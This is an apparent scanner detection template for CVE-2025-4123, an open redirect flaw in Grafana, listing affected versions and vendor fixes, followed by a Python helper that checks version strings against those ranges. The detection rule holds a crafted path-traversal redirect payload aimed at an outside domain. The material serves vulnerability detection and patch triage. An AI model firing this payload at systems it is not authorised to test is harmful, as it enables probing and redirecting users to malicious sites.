Vulnerability Description
This vulnerability allows an attacker to redirect users to a malicious website via a custom frontend plugin and execute arbitrary JavaScript code.
id: CVE-2025-4123
info:
  name: Grafana开放重定向&服务端请求伪造漏洞
  author: free2e
  severity: high
  verified: true
  description: |
    该漏洞允许攻击者通过自定义前端插件将用户重定向到恶意网站,并执行任意 JavaScript 代码。
  affected: 8.0.0 ≤ grafana < 10.4.18、11.2.0 ≤ grafana < 11.2.9、11.3.0 ≤ grafana < 11.3.6、11.4.0 ≤ grafana < 11.4.4、11.5.0 ≤ grafana < 11.5.4、11.6.0 ≤ grafana < 11.6.1、12.0.0 ≤ grafana < 12.0.1
  solutions: 目前厂商已发布升级补丁以修复漏洞 https://grafana.com/security/security-advisories/cve-2025-4123/ 、https://grafana.com/blog/2025/05/21/grafana-security-release-high-severity-security-fix-for-cve-2025-4123/
  reference:
    - https://mp.weixin.qq.com/s/URckOUcTYvZR4rh9MS9T_w
  tags: Grafana、CVE-2025-4123
rules:
  r0:
    request:
      method: GET
      path: /public/..%2F%5ddfaggust.pro%2F%3f%2F..%2F..
    expression: |
      response.status == 302 &&
      response.headers["location"].contains("dfaggust.pro") &&
      response.body.bcontains(b'<a href="/]dfaggust.pro/?/../../">Found</a>.')
expression: r0()
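As an added example that is not part of the template above, the following Python helper encodes the version ranges from the `affected:` field exactly as given and tells, for each build in an inventory, whether it lies inside one of them and which release in that line is the first fixed one. It knows only the listed ranges (builds carrying a `+security` or pre-release suffix are reported for manual checking rather than guessed at), and the sample version strings are constructed.

```python
from typing import Dict, List, Optional, Tuple
Version = Tuple[int, int, int]

# Affected ranges exactly as listed in the template's `affected:` field: lower bound
# inclusive, upper bound exclusive (the upper bound is the first fixed release of that line).
AFFECTED_RANGES: List[Tuple[Version, Version]] = [
    ((8, 0, 0), (10, 4, 18)),
    ((11, 2, 0), (11, 2, 9)),
    ((11, 3, 0), (11, 3, 6)),
    ((11, 4, 0), (11, 4, 4)),
    ((11, 5, 0), (11, 5, 4)),
    ((11, 6, 0), (11, 6, 1)),
    ((12, 0, 0), (12, 0, 1)),
]

def parse_version(text: str) -> Version:
    """Parse a plain 'major.minor.patch' string (optional leading 'v') into a comparable tuple.
    Pre-release or '+security' build suffixes raise ValueError: such builds must be checked
    against the vendor advisory by hand rather than guessed at from the numeric part."""
    parts = text.strip().lstrip("v").split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised Grafana version string: {text!r}")
    return int(parts[0]), int(parts[1]), int(parts[2])

def fixed_release_for(text: str) -> Optional[str]:
    """First patched release of the line the version falls in, or None if it is not affected."""
    version = parse_version(text)
    for low, high in AFFECTED_RANGES:
        if low <= version < high:
            return ".".join(str(n) for n in high)
    return None

def triage(versions: List[str]) -> Dict[str, str]:
    """Map each inventory entry to 'upgrade to X', 'not affected' or 'unparsed: check advisory'."""
    result: Dict[str, str] = {}
    for ver in versions:
        try:
            fix = fixed_release_for(ver)
        except ValueError:
            result[ver] = "unparsed: check advisory"
            continue
        result[ver] = f"upgrade to {fix}" if fix else "not affected"
    return result

if __name__ == "__main__":
    # Constructed sample inventory, not taken from the advisory.
    for ver, verdict in triage(["10.4.17", "11.2.9", "v11.5.3", "12.0.1", "11.6.0+security-01"]).items():
        print(f"{ver:>20}  {verdict}")
```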